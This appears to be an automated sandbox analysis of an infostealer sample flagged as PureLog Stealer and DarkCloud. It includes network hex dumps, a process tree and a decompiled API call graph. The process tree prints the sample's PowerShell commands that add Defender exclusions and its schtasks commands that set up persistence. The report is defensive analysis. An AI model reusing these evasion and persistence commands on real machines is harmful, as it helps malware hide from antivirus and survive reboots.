                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:00 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:48:00 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:48:23 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:48:23 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:14:46:13
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x870000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:14:46:16
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:14:46:16
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:14:46:19
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:14:46:19
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:14:46:22
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:14:46:22
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:14:46:23
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:14:46:24
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Imagebase:0x8e0000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 66%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:14:46:28
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0xc10000
                                                                                      File size:418'304 bytes
                                                                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:9.5%
                                                                                        Total number of Nodes:243
                                                                                        Total number of Limit Nodes:27
                                                                                        execution_graph 45028 b610960 45030 b610972 45028->45030 45029 b610a8d 45030->45029 45033 72692e1 45030->45033 45039 7266bb8 45030->45039 45034 7269334 45033->45034 45037 72693ae 45033->45037 45035 7269341 GetFocus 45034->45035 45034->45037 45036 7269369 45035->45036 45036->45037 45038 72693ac KiUserCallbackDispatcher 45036->45038 45037->45029 45038->45037 45041 7266bc3 45039->45041 45040 72693ae 45040->45029 45041->45040 45042 7269341 GetFocus 45041->45042 45043 7269369 45042->45043 45043->45040 45044 72693ac KiUserCallbackDispatcher 45043->45044 45044->45040 45045 72645a0 45046 726460b 45045->45046 45051 72649a0 45045->45051 45047 72646ca GetCapture 45046->45047 45046->45051 45048 726470c 45047->45048 45049 726474d GetActiveWindow 45048->45049 45050 7264784 45049->45050 45050->45051 45054 726a8c0 45050->45054 45064 726a8d0 45050->45064 45056 726a8f6 45054->45056 45055 726a90a 45055->45051 45056->45055 45061 726aa45 45056->45061 45074 133e190 45056->45074 45080 133e18b 45056->45080 45057 726abc9 45057->45051 45060 7266bb8 2 API calls 45060->45057 45061->45057 45061->45060 45066 726a8f6 45064->45066 45065 726a90a 45065->45051 45066->45065 45071 726aa45 45066->45071 45072 133e190 2 API calls 45066->45072 45073 133e18b 2 API calls 45066->45073 45067 726abc9 45067->45051 45068 726a9f5 45068->45071 45088 7266aac 45068->45088 45070 7266bb8 2 API calls 45070->45067 45071->45067 45071->45070 45072->45068 45073->45068 45076 133e1be 45074->45076 45075 133e1e7 45078 133e28a KiUserCallbackDispatcher 45075->45078 45079 133e28f 45075->45079 45076->45075 45076->45079 45086 133dd80 GetFocus 45076->45086 45078->45079 45081 133e1be 45080->45081 45083 133e1e7 45081->45083 45085 133e28f 45081->45085 45087 133dd80 GetFocus 45081->45087 45084 133e28a KiUserCallbackDispatcher 45083->45084 45083->45085 45084->45085 45086->45075 45087->45083 45089 72679b0 PostMessageW 45088->45089 45090 7267a1c 45089->45090 45090->45071 45283 72660c0 45284 7266104 45283->45284 45285 726610e EnumThreadWindows 45283->45285 45284->45285 45286 7266140 45285->45286 45091 72657ae 45094 7264fd8 45091->45094 45095 7264fe3 45094->45095 45098 7265fc0 45095->45098 45096 72657bb 45099 726601f GetCurrentThreadId 45098->45099 45101 7266065 45099->45101 45101->45096 45102 133b3b8 45103 133b400 GetModuleHandleW 45102->45103 45104 133b3fa 45102->45104 45105 133b42d 45103->45105 45104->45103 45125 726c88b 45126 726c89e 45125->45126 45130 726caa1 45126->45130 45134 726cac8 PostMessageW 45126->45134 45127 726c8c1 45131 726cac6 PostMessageW 45130->45131 45133 726cb34 45131->45133 45133->45127 45135 726cb34 45134->45135 45135->45127 45106 7269d28 45107 7269d49 45106->45107 45108 7266bb8 2 API calls 45107->45108 45110 7269dab 45107->45110 45109 7269da4 45108->45109 45111 7266da8 45112 7266dc1 45111->45112 45114 7266dcb 45111->45114 45112->45114 45115 7265268 45112->45115 45117 7265273 45115->45117 45119 7266b68 45117->45119 45118 72683aa 45118->45114 45121 7266b73 45119->45121 45120 7268436 45120->45118 45121->45120 45122 7266bb8 2 API calls 45121->45122 45122->45120 45136 bf98d28 45137 bf98d42 45136->45137 45138 bf98d66 45137->45138 45143 bf994f3 45137->45143 45147 bf99566 45137->45147 45151 bf995e3 45137->45151 45155 bf9952d 45137->45155 45144 bf9950d 45143->45144 45145 bf99590 45144->45145 45159 bf99f00 45144->45159 45145->45138 45148 bf9956c 45147->45148 45149 bf99590 45148->45149 45150 bf99f00 3 API calls 45148->45150 45149->45138 45150->45149 45152 bf9957e 45151->45152 45153 bf99590 45152->45153 45154 bf99f00 3 API calls 45152->45154 45153->45138 45154->45153 45156 bf99547 45155->45156 45157 bf99590 45156->45157 45158 bf99f00 3 API calls 45156->45158 45157->45138 45158->45157 45160 bf99f03 45159->45160 45162 bf99f7e 45159->45162 45160->45145 45161 bf9a123 45161->45145 45162->45161 45164 7266aac PostMessageW 45162->45164 45166 7266aa0 45162->45166 45170 72679a9 PostMessageW 45162->45170 45164->45162 45167 7266aa5 PostMessageW 45166->45167 45169 7267a1c 45167->45169 45169->45162 45171 7267a1c 45170->45171 45171->45162 45172 bf92028 45184 bf91808 GetKeyState 45172->45184 45174 bf92056 45176 bf91808 5 API calls 45174->45176 45178 bf9206b 45174->45178 45177 bf92099 45176->45177 45179 bf9209d 45177->45179 45180 bf91808 5 API calls 45177->45180 45181 bf920be 45180->45181 45185 bf91868 GetKeyState 45184->45185 45188 bf918ad GetKeyState 45185->45188 45189 bf918f2 GetKeyState 45188->45189 45191 bf91937 GetKeyState 45189->45191 45193 bf9197c 45191->45193 45193->45174 45194 bf92118 45193->45194 45198 bf92128 45193->45198 45195 bf9211c 45194->45195 45196 bf92141 KiUserCallbackDispatcher 45195->45196 45197 bf9214a 45195->45197 45196->45197 45197->45174 45199 bf92136 45198->45199 45200 bf92141 KiUserCallbackDispatcher 45199->45200 45201 bf9214a 45199->45201 45200->45201 45201->45174 45202 133d460 45203 133d4a6 GetCurrentProcess 45202->45203 45205 133d4f1 45203->45205 45206 133d4f8 GetCurrentThread 45203->45206 45205->45206 45207 133d535 GetCurrentProcess 45206->45207 45208 133d52e 45206->45208 45209 133d56b 45207->45209 45208->45207 45210 133d593 GetCurrentThreadId 45209->45210 45211 133d5c4 45210->45211 45123 133d6a8 DuplicateHandle 45124 133d73e 45123->45124 45212 1334668 45213 133467a 45212->45213 45214 1334686 45213->45214 45218 1334778 45213->45218 45223 1334204 45214->45223 45216 13346a5 45219 133479d 45218->45219 45227 1334879 45219->45227 45231 1334888 45219->45231 45224 133420f 45223->45224 45239 1335d1c 45224->45239 45226 13370a3 45226->45216 45229 1334888 45227->45229 45228 133498c 45228->45228 45229->45228 45235 13344e4 45229->45235 45232 13348af 45231->45232 45233 133498c 45232->45233 45234 13344e4 CreateActCtxA 45232->45234 45234->45233 45236 1335918 CreateActCtxA 45235->45236 45238 13359db 45236->45238 45238->45238 45240 1335d27 45239->45240 45243 1335d3c 45240->45243 45242 13372a5 45242->45226 45244 1335d47 45243->45244 45247 1335d6c 45244->45247 45246 1337382 45246->45242 45248 1335d77 45247->45248 45251 1335d9c 45248->45251 45250 1337485 45250->45246 45252 1335da7 45251->45252 45253 1338a29 45252->45253 45255 133cd80 45252->45255 45253->45250 45256 133cdb1 45255->45256 45257 133cdd5 45256->45257 45260 133d343 45256->45260 45264 133d348 45256->45264 45257->45253 45262 133d355 45260->45262 45261 133d38f 45261->45257 45262->45261 45268 133d170 45262->45268 45265 133d355 45264->45265 45266 133d170 3 API calls 45265->45266 45267 133d38f 45265->45267 45266->45267 45267->45257 45269 133d175 45268->45269 45271 133dca0 45269->45271 45272 133d28c 45269->45272 45271->45271 45273 133d297 45272->45273 45274 1335d9c 3 API calls 45273->45274 45275 133dd0f 45274->45275 45276 133dd1e 45275->45276 45277 133e190 2 API calls 45275->45277 45278 133e18b 2 API calls 45275->45278 45276->45271 45277->45276 45278->45276 45279 7267978 45280 7267988 45279->45280 45281 7266aac PostMessageW 45280->45281 45282 7267999 45281->45282 45287 7264ed8 45288 7264f00 45287->45288 45291 72633d4 45288->45291 45292 72633df 45291->45292 45293 72655c1 45292->45293 45294 7265587 45292->45294 45299 72643e8 45292->45299 45304 72643b6 45292->45304 45294->45293 45309 b611690 45294->45309 45316 b6116a0 45294->45316 45300 72643fc 45299->45300 45301 726a8c0 6 API calls 45299->45301 45302 726a8d0 6 API calls 45299->45302 45323 726abcf 45299->45323 45300->45294 45301->45300 45302->45300 45306 726a8c0 6 API calls 45304->45306 45307 726a8d0 6 API calls 45304->45307 45308 726abcf 2 API calls 45304->45308 45305 72643fc 45305->45294 45306->45305 45307->45305 45308->45305 45315 b611705 45309->45315 45310 b6105c0 PeekMessageW 45310->45315 45312 b611b68 WaitMessage 45312->45315 45313 b611752 45313->45293 45315->45310 45315->45312 45315->45313 45327 b6105d8 45315->45327 45330 b61060c 45315->45330 45321 b611705 45316->45321 45317 b6105c0 PeekMessageW 45317->45321 45318 b6105d8 KiUserCallbackDispatcher 45318->45321 45319 b611b68 WaitMessage 45319->45321 45320 b61060c DispatchMessageW 45320->45321 45321->45317 45321->45318 45321->45319 45321->45320 45322 b611752 45321->45322 45322->45293 45325 726ab4b 45323->45325 45324 726abc9 45324->45300 45325->45324 45326 7266bb8 2 API calls 45325->45326 45326->45324 45328 b612008 KiUserCallbackDispatcher 45327->45328 45329 b61207c 45328->45329 45329->45315 45331 b6124e0 DispatchMessageW 45330->45331 45333 b61254c 45331->45333 45333->45315

                                                                                        Executed Functions

                                                                                        Function 072645A0 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 553COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 294 72645a0-7264605 295 7264aed-7264b56 294->295 296 726460b-7264618 294->296 300 7264b5d-7264bb4 295->300 299 726461e-7264628 296->299 296->300 305 726462e-7264638 299->305 306 7264bbb-7264c12 299->306 300->306 308 726463e-7264648 305->308 309 7264c19-7264c70 305->309 306->309 312 7264c77-7264cd4 308->312 313 726464e-7264655 308->313 309->312 320 7264cdb-7264d49 312->320 313->320 321 726465b-726465f 313->321 380 7264d51-7264d53 320->380 381 7264d4b-7264d4f 320->381 324 72646b6-726470a call 72632b8 call 72632c8 GetCapture 321->324 325 7264661-7264696 321->325 347 7264713-7264721 324->347 348 726470c-7264712 324->348 325->324 350 7264698-72646a7 325->350 353 7264723-7264748 call 72632d8 347->353 354 726474d-7264782 GetActiveWindow 347->354 348->347 350->324 366 72646a9-72646b3 call 72632a8 350->366 353->354 360 7264784-726478a 354->360 361 726478b-726479c 354->361 360->361 363 726479e-72647a9 361->363 364 72647ab 361->364 369 72647ae-72647e0 363->369 364->369 366->324 386 72647f5-7264818 369->386 387 72647e2-72647e8 369->387 382 7264d58-7264d66 380->382 381->382 392 72648e0-72648ea 386->392 393 726481e-7264828 386->393 387->386 388 72647ea-72647f0 call 72632e4 387->388 388->386 394 72648f5-7264918 392->394 395 72648ec-72648ef call 7264db7 392->395 393->392 398 726482e-7264861 393->398 401 7264920-726492e 394->401 402 726491a-726491d 394->402 395->394 405 7264867-72648d6 398->405 406 7264a33-7264ac2 call 72632e4 398->406 407 7264964-7264972 401->407 408 7264930-726493e 401->408 402->401 405->392 406->295 414 7264974-7264982 407->414 415 7264990-7264997 